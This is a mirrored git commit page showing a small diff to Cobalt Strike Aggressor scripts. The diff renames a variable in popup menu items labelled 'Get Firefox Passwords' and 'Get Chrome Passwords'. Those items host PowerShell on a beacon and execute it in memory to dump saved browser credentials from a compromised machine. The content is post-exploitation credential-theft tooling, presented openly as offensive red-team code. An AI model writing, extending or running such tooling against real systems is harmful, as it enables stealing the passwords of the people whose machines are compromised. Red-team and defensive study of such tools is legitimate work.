mirror of
https://github.com/Und3rf10w/Aggressor-scripts
synced 2026-06-08 12:46:53 +00:00
small readability fix
This commit is contained in:
@@ -69,9 +69,9 @@ popup beacon_bottom{
|
||||
closef($handle);
|
||||
# host firefox script on beacon
|
||||
$cmd = bhost_script($bid, $firefox_script);
|
||||
binput($1, "powershell Get-FirefoxPasswords");
|
||||
binput($bid, "powershell Get-FirefoxPasswords");
|
||||
# execute in-memory hosted script
|
||||
bpowershell($1, "$cmd");
|
||||
bpowershell($bid, "$cmd");
|
||||
}
|
||||
}
|
||||
item "Get Chrome Passwords"{
|
||||
@@ -84,9 +84,9 @@ popup beacon_bottom{
|
||||
closef($handle);
|
||||
# host chrome script on beacon
|
||||
$cmd = bhost_script($bid, $chrome_script);
|
||||
binput($1, "powershell Get-ChromePasswords");
|
||||
binput($bid, "powershell Get-ChromePasswords");
|
||||
# execute in-memory hosted script
|
||||
bpowershell($1, "$cmd");
|
||||
bpowershell($bid, "$cmd");
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
Reference in New Issue
Block a user